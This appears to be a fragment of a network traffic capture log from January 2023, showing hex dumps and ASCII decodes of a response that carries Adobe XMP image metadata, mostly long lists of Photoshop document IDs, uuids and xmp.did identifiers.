                                                                                                                                                                                    2023-01-05 07:58:10 UTC3888INData Raw: 39 30 34 33 33 2d 35 61 61 33 2d 31 31 65 36 2d 62 33 37 39 2d 62 64 62 65 65 32 33 33 61 65 31 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 66 61 33 38 65 39 38 2d 66 31 66 34 2d 31 31 64 38 2d 62 61 61 35 2d 64 38 31 30 35 65 36 63 37 39 35 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 66 61 34 63 30 65 39 2d 65 31 33 31 2d 33 65 34 62 2d 61 38 35 61 2d 62 36 64 38 34 34 36 33 62 33 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 35 66 66 63 65 34 61 61 2d 31 38 64 32 2d 65 37 34 62 2d 62 33 32 61 2d 65 38 34 64 36 65
                                                                                                                                                                                    Data Ascii: 90433-5aa3-11e6-b379-bdbee233ae1d</rdf:li> <rdf:li>adobe:docid:photoshop:5fa38e98-f1f4-11d8-baa5-d8105e6c795a</rdf:li> <rdf:li>adobe:docid:photoshop:5fa4c0e9-e131-3e4b-a85a-b6d84463b356</rdf:li> <rdf:li>adobe:docid:photoshop:5ffce4aa-18d2-e74b-b32a-e84d6e
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4015INData Raw: 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 36 34 34 36 64 38 61 2d 39 61 61 34 2d 31 31 64 38 2d 39 63 65 38 2d 65 63 66 65 65 32 34 61 61 62 64 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 36 35 39 38 62 61 31 2d 33 36 39 36 2d 31 31 65 37 2d 61 38 30 39 2d 61 62 62 65 62 64 30 32 63 34 66 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 36 36 36 62 62 62 33 2d 32 62 32 37 2d 31 31 65 36 2d 61 38 65 35 2d 66 31 63 30 39 62 31 37 65 66 38 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 36
                                                                                                                                                                                    Data Ascii: li>adobe:docid:photoshop:76446d8a-9aa4-11d8-9ce8-ecfee24aabd6</rdf:li> <rdf:li>adobe:docid:photoshop:76598ba1-3696-11e7-a809-abbebd02c4fd</rdf:li> <rdf:li>adobe:docid:photoshop:7666bbb3-2b27-11e6-a8e5-f1c09b17ef8c</rdf:li> <rdf:li>adobe:docid:photoshop:76
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4063INData Raw: 62 34 61 30 2d 66 32 30 30 32 61 36 37 38 61 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 36 66 38 31 66 38 32 2d 32 35 61 64 2d 36 62 34 37 2d 62 30 61 61 2d 32 63 64 34 39 38 37 34 36 34 31 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 37 34 35 33 35 38 66 2d 64 33 37 38 2d 31 31 37 38 2d 61 32 30 64 2d 61 66 32 65 66 39 63 31 39 37 64 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 37 36 37 30 30 65 32 2d 31 33 64 39 2d 31 31 37 38 2d 62 34 61 30 2d 66 32 30 30 32 61 36 37 38 61 36 30 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: b4a0-f2002a678a60</rdf:li> <rdf:li>adobe:docid:photoshop:a6f81f82-25ad-6b47-b0aa-2cd498746419</rdf:li> <rdf:li>adobe:docid:photoshop:a745358f-d378-1178-a20d-af2ef9c197df</rdf:li> <rdf:li>adobe:docid:photoshop:a76700e2-13d9-1178-b4a0-f2002a678a60</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4079INData Raw: 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 65 30 63 39 65 37 66 2d 36 66 34 38 2d 31 31 65 38 2d 61 39 33 64 2d 63 66 39 61 61 38 65 37 66 33 37 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 65 34 32 63 30 61 66 2d 30 66 65 34 2d 31 31 37 39 2d 61 64 30 65 2d 61 30 38 63 63 38 30 32 63 32 31 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 65 34 65 62 61 65 66 2d 64 39 39 62 2d 31 31 65 34 2d 39 66 39 65 2d 39 64 61 38 39 30 63 39 64 61 34 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 65 36 61 38 31 30 61 2d 33 35 62 35 2d
                                                                                                                                                                                    Data Ascii: id:photoshop:de0c9e7f-6f48-11e8-a93d-cf9aa8e7f37c</rdf:li> <rdf:li>adobe:docid:photoshop:de42c0af-0fe4-1179-ad0e-a08cc802c212</rdf:li> <rdf:li>adobe:docid:photoshop:de4ebaef-d99b-11e4-9f9e-9da890c9da4c</rdf:li> <rdf:li>adobe:docid:photoshop:de6a810a-35b5-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4094INData Raw: 32 35 62 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 31 62 62 30 63 38 31 2d 65 37 32 62 2d 31 31 65 37 2d 62 33 66 37 2d 64 65 32 31 62 61 37 61 39 37 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 31 65 62 61 31 62 61 2d 35 64 63 66 2d 65 63 34 61 2d 39 38 65 64 2d 33 37 64 32 62 62 31 37 36 62 39 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 33 39 38 31 33 66 34 2d 33 32 64 35 2d 31 31 65 38 2d 39 61 39 61 2d 61 31 36 32 63 66 34 65 31 61 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65
                                                                                                                                                                                    Data Ascii: 25b1</rdf:li> <rdf:li>adobe:docid:photoshop:f1bb0c81-e72b-11e7-b3f7-de21ba7a9782</rdf:li> <rdf:li>adobe:docid:photoshop:f1eba1ba-5dcf-ec4a-98ed-37d2bb176b9f</rdf:li> <rdf:li>adobe:docid:photoshop:f39813f4-32d5-11e8-9a9a-a162cf4e1a42</rdf:li> <rdf:li>adobe
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4150INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 39 33 36 32 31 31 38 32 41 39 44 44 44 31 31 41 32 37 39 41 31 41 30 34 46 35 35 39 44 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 39 36 39 34 35 45 38 34 33 35 42 45 31 31 31 38 32 42 31 45 30 38 30 44 33 39 42 36 45 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 39 37 43 34 35 46 33 33 31 41 33 45 30 31 31 42 42 35 42 43 37 35 31 34 35 46 37 38 34 42 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 39 37 45 31 34 39 39 38 44 37 42 45 30 31 31 38 41 46 35 45 30 34 37 38 38 31 45 45 38 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 39 41 46 44 38 44 45 32 44 41 41 44 41 31 31 39 33 33 37
                                                                                                                                                                                    Data Ascii: > <rdf:li>uuid:293621182A9DDD11A279A1A04F559DDE</rdf:li> <rdf:li>uuid:296945E8435BE11182B1E080D39B6EEB</rdf:li> <rdf:li>uuid:297C45F331A3E011BB5BC75145F784BD</rdf:li> <rdf:li>uuid:297E14998D7BE0118AF5E047881EE8D6</rdf:li> <rdf:li>uuid:29AFD8DE2DAADA119337
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4206INData Raw: 32 31 41 30 30 45 42 44 39 39 41 38 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 44 37 38 34 42 43 39 45 36 31 46 45 30 31 31 39 31 35 34 42 34 42 41 42 30 38 35 46 43 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 44 44 36 46 30 32 44 35 32 35 36 44 43 31 31 38 45 42 33 38 36 31 31 42 32 36 46 43 33 35 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 45 30 44 30 43 39 39 45 30 44 33 44 46 31 31 42 32 42 42 42 43 34 30 43 42 45 30 45 43 42 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 35 45 39 34 37 38 38 36 32 34 33 31 45 30 31 31 39 37 36 38 44 45 32 46 35 32 31 31 32 46 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69
                                                                                                                                                                                    Data Ascii: 21A00EBD99A8D2</rdf:li> <rdf:li>uuid:5D784BC9E61FE0119154B4BAB085FC52</rdf:li> <rdf:li>uuid:5DD6F02D5256DC118EB38611B26FC35B</rdf:li> <rdf:li>uuid:5E0D0C99E0D3DF11B2BBBC40CBE0ECBB</rdf:li> <rdf:li>uuid:5E9478862431E0119768DE2F52112F6B</rdf:li> <rdf:li>uui
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4246INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 37 30 46 42 34 42 37 41 31 37 35 45 30 31 31 38 36 30 43 45 37 43 38 39 34 43 33 46 38 38 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 37 32 39 41 46 38 43 45 34 34 41 44 44 31 31 39 38 42 46 43 41 34 46 46 35 37 43 44 31 45 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 37 33 43 39 46 36 44 35 34 39 34 31 31 44 41 38 45 43 32 43 32 46 37 32 38 33 38 46 39 37 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 37 34 38 45 34 35 30 37 38 36 35 44 45 31 31 41 31 44 42 41 44 37 35 41 38 34 37 42 31 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 37 36 32 38 32 36 35 32 35 33 31 45 30 31 31 39
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>uuid:770FB4B7A175E011860CE7C894C3F888</rdf:li> <rdf:li>uuid:7729AF8CE44ADD1198BFCA4FF57CD1E8</rdf:li> <rdf:li>uuid:773C9F6D549411DA8EC2C2F72838F970</rdf:li> <rdf:li>uuid:7748E4507865DE11A1DBAD75A847B1DB</rdf:li> <rdf:li>uuid:776282652531E0119
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4325INData Raw: 42 31 39 38 37 43 39 44 30 33 35 39 34 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 41 32 31 33 46 44 43 33 44 31 35 31 31 44 43 42 31 37 30 44 36 30 36 43 38 41 46 44 34 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 41 33 31 43 35 34 36 30 41 34 46 44 46 31 31 38 36 31 36 45 31 39 31 33 45 31 34 44 30 43 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 41 33 43 44 33 45 39 33 41 38 44 45 30 31 31 41 36 39 39 46 43 34 36 43 46 31 35 32 32 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 41 37 42 32 41 30 32 44 36 32 43 31 31 44 43 39 30 43 33 42 43 34 33 43 42 42 32 42 30 37 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75
                                                                                                                                                                                    Data Ascii: B1987C9D035948F</rdf:li> <rdf:li>uuid:AA213FDC3D1511DCB170D606C8AFD490</rdf:li> <rdf:li>uuid:AA31C5460A4FDF118616E1913E14D0C0</rdf:li> <rdf:li>uuid:AA3CD3E93A8DE011A699FC46CF152231</rdf:li> <rdf:li>uuid:AA7B2A02D62C11DC90C3BC43CBB2B07F</rdf:li> <rdf:li>uu
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4341INData Raw: 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 36 45 39 43 30 33 33 42 43 44 42 45 30 31 31 41 39 42 32 38 45 44 39 44 46 43 41 41 46 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 37 30 36 36 33 35 30 39 35 38 45 44 42 31 31 42 43 35 30 45 41 39 35 42 34 31 43 41 41 33 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 37 32 41 39 43 46 43 37 44 42 38 31 31 44 42 42 30 32 44 46 32 41 35 45 30 44 39 32 44 37 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 37 36 35 44 45 43 45 31 31 45 34 44 44 31 31 41 32 34 42 42 32 46 43 37 32 39 44 33 39 37 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 37 41 35 33 38 35 32 39 43 32 31 45 30 31 31 41 35 38 35 41
                                                                                                                                                                                    Data Ascii: <rdf:li>uuid:E6E9C033BCDBE011A9B28ED9DFCAAF13</rdf:li> <rdf:li>uuid:E7066350958EDB11BC50EA95B41CAA35</rdf:li> <rdf:li>uuid:E72A9CFC7DB811DBB02DF2A5E0D92D76</rdf:li> <rdf:li>uuid:E765DECE11E4DD11A24BB2FC729D397E</rdf:li> <rdf:li>uuid:E7A538529C21E011A585A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4349INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 30 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 38 43 36 46 38 44 30 34 30 32 43 34 36 44 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 30 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 45 42 45 37 39 34 43 35 31 41 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 30 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 39 35 41 32 37 46 38 45 42 38 41 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 30 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 31 30 39 45 33 36 32 41 34 34 44 39 30 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 30
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>xmp.did:008011740720681188C6F8D0402C46D3</rdf:li> <rdf:li>xmp.did:00801174072068118A6DEBE794C51A86</rdf:li> <rdf:li>xmp.did:0080117407206811910995A27F8EB8A1</rdf:li> <rdf:li>xmp.did:00801174072068119109E362A44D9054</rdf:li> <rdf:li>xmp.did:00
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4381INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 43 37 45 31 44 34 42 30 43 36 45 30 31 31 39 44 33 35 42 38 35 42 37 45 32 45 39 45 45 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 45 37 32 41 43 36 30 38 32 30 36 38 31 31 41 39 37 42 38 30 32 32 32 45 33 31 32 30 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 46 44 31 43 41 36 30 37 32 30 36 38 31 31 39 32 42 30 44 45 36 45 32 32 44 33 34 44 30 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 32 65 35 34 64 32 36 2d 30 36 65 65 2d 34 61 34 36 2d 39 61 39 63 2d 33 34 36 36 31 31 39 63 65 33 64 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>xmp.did:02C7E1D4B0C6E0119D35B85B7E2E9EE3</rdf:li> <rdf:li>xmp.did:02E72AC608206811A97B80222E312031</rdf:li> <rdf:li>xmp.did:02FD1CA60720681192B0DE6E22D34D0A</rdf:li> <rdf:li>xmp.did:02e54d26-06ee-4a46-9a9c-3466119ce3d2</rdf:li> <rdf:li>xm
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4462INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 32 45 37 41 36 41 32 38 31 42 31 32 35 32 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 35 46 45 44 38 42 44 46 38 34 31 43 37 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 37 41 35 46 31 39 39 37 36 30 34 35 45 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 37 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 39 34 43 39 45 33 46 41 33 38 46 39 43 37 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>xmp.did:078011740720681192E7A6A281B12522</rdf:li> <rdf:li>xmp.did:078011740720681195FED8BDF841C77D</rdf:li> <rdf:li>xmp.did:078011740720681197A5F19976045E47</rdf:li> <rdf:li>xmp.did:0780117407206811994C9E3FA38F9C77</rdf:li> <rdf:li>xmp.did:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4595INData Raw: 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 39 39 39 44 32 36 44 39 44 46 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 41 36 44 44 34 36 44 41 30 43 41 31 30 43 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 43 31 34 42 38 37 30 37 44 35 37 30 41 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34 30 37 32 30 36 38 31 31 38 43 31 34 42 39 39 35 30 45 36 44 39 32 32 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 41 38 30 31 31 37 34
                                                                                                                                                                                    Data Ascii: rdf:li>xmp.did:0A801174072068118A6D999D26D9DFD0</rdf:li> <rdf:li>xmp.did:0A801174072068118A6DD46DA0CA10CF</rdf:li> <rdf:li>xmp.did:0A801174072068118C14B8707D570A5C</rdf:li> <rdf:li>xmp.did:0A801174072068118C14B9950E6D9222</rdf:li> <rdf:li>xmp.did:0A801174
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4651INData Raw: 64 3a 31 39 41 41 41 37 37 35 32 32 32 34 36 38 31 31 39 39 34 43 41 30 45 36 41 42 31 43 31 35 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 39 42 35 38 35 31 37 39 31 32 36 45 30 31 31 39 46 42 33 38 37 43 43 32 39 43 37 36 38 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 39 42 42 30 37 34 45 32 35 32 34 36 38 31 31 41 46 41 32 43 43 36 35 37 39 38 36 31 35 35 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 39 45 43 38 36 44 33 43 33 32 39 36 38 31 31 39 39 34 43 41 30 45 36 41 42 31 43 31 35 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 39 45 44 32 46 34 43 32 35 32 36 36 38 31 31 39 34 35 37 39
                                                                                                                                                                                    Data Ascii: d:19AAA77522246811994CA0E6AB1C1578</rdf:li> <rdf:li>xmp.did:19B585179126E0119FB387CC29C768EC</rdf:li> <rdf:li>xmp.did:19BB074E25246811AFA2CC657986155B</rdf:li> <rdf:li>xmp.did:19EC86D3C3296811994CA0E6AB1C1578</rdf:li> <rdf:li>xmp.did:19ED2F4C2526681194579
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4683INData Raw: 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 39 44 43 37 42 42 37 39 38 32 31 36 38 31 31 38 46 36 32 41 30 46 44 44 38 46 41 33 37 46 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 39 44 45 30 42 39 39 30 44 32 30 36 38 31 31 38 30 38 33 45 44 43 46 30 37 45 34 31 37 31 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 39 45 38 41 41 36 44 42 46 45 46 45 32 31 31 42 30 37 34 42 33 45 45 37 31 42 39 41 36 33 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 39 64 37 32 35 39 36 2d 35 35 38 39 2d 34 66 66 39 2d 38 64 36 32 2d 31 32 38 31 65 39 39 36 36 30 62 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 39 66 64 30 38 38
                                                                                                                                                                                    Data Ascii: :li>xmp.did:29DC7BB7982168118F62A0FDD8FA37F2</rdf:li> <rdf:li>xmp.did:29DE0B990D2068118083EDCF07E41711</rdf:li> <rdf:li>xmp.did:29E8AA6DBFEFE211B074B3EE71B9A63D</rdf:li> <rdf:li>xmp.did:29d72596-5589-4ff9-8d62-1281e99660b5</rdf:li> <rdf:li>xmp.did:29fd088
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4981INData Raw: 41 34 30 32 43 35 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 30 45 34 42 33 46 32 46 44 39 44 45 31 31 31 41 44 44 32 39 42 36 38 34 45 34 35 45 35 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 30 61 30 33 32 36 62 2d 38 38 36 64 2d 61 34 34 39 2d 62 62 62 33 2d 66 30 33 31 64 31 30 31 61 32 64 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 30 61 35 36 33 61 66 2d 61 38 34 37 2d 34 31 32 31 2d 62 66 34 63 2d 39 65 35 65 37 35 37 30 35 66 30 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 30 62 33 34 31 35 34 2d 63 65 38 63 2d 34 33 38 36 2d 39 39 36 39 2d 37 36 62 64 61 61 32 36 37 39 62 63 3c 2f 72
                                                                                                                                                                                    Data Ascii: A402C523</rdf:li> <rdf:li>xmp.did:30E4B3F2FD9DE111ADD29B684E45E581</rdf:li> <rdf:li>xmp.did:30a0326b-886d-a449-bbb3-f031d101a2d7</rdf:li> <rdf:li>xmp.did:30a563af-a847-4121-bf4c-9e5e75705f04</rdf:li> <rdf:li>xmp.did:30b34154-ce8c-4386-9969-76bdaa2679bc</r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5021INData Raw: 35 32 63 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 64 30 37 66 64 31 31 2d 63 30 34 35 2d 64 66 34 38 2d 61 63 32 31 2d 37 38 37 37 39 61 33 65 39 37 63 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 64 37 31 38 30 61 30 2d 65 36 66 31 2d 34 39 36 62 2d 38 39 32 30 2d 39 35 61 38 63 35 30 38 38 64 32 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 64 64 65 31 39 66 64 2d 35 34 34 66 2d 34 30 35 61 2d 62 36 63 61 2d 34 62 36 64 61 62 30 64 61 32 65 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 65 31 34 35 61 65 65 2d 36 35 34 31 2d 34 64 35 33 2d 38 36 31 61 2d 62 33 32 35 33 33 39 38 36 33 37 63 3c 2f 72
                                                                                                                                                                                    Data Ascii: 52c1</rdf:li> <rdf:li>xmp.did:3d07fd11-c045-df48-ac21-78779a3e97c9</rdf:li> <rdf:li>xmp.did:3d7180a0-e6f1-496b-8920-95a8c5088d2d</rdf:li> <rdf:li>xmp.did:3dde19fd-544f-405a-b6ca-4b6dab0da2e1</rdf:li> <rdf:li>xmp.did:3e145aee-6541-4d53-861a-b3253398637c</r
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5053INData Raw: 69 64 3a 34 63 39 32 64 62 61 66 2d 32 30 39 34 2d 34 33 38 64 2d 38 38 35 36 2d 35 35 36 31 37 34 64 65 39 32 38 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 63 62 37 34 62 31 39 2d 37 66 66 39 2d 63 61 34 34 2d 38 33 36 39 2d 64 66 32 31 64 30 39 32 39 30 37 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 63 63 38 66 62 63 30 2d 37 33 64 37 2d 34 34 65 34 2d 39 62 32 39 2d 30 38 36 35 31 65 38 31 63 39 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 63 65 36 61 39 36 39 2d 37 32 34 34 2d 34 66 30 33 